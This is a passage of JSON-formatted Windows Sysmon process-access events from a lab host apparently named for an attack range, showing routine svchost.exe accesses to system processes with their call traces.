08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010C4AB0900}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010C4AB0900}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.570","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1976\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-00108DB10900}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Windows\\System32\\XblGameSaveTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 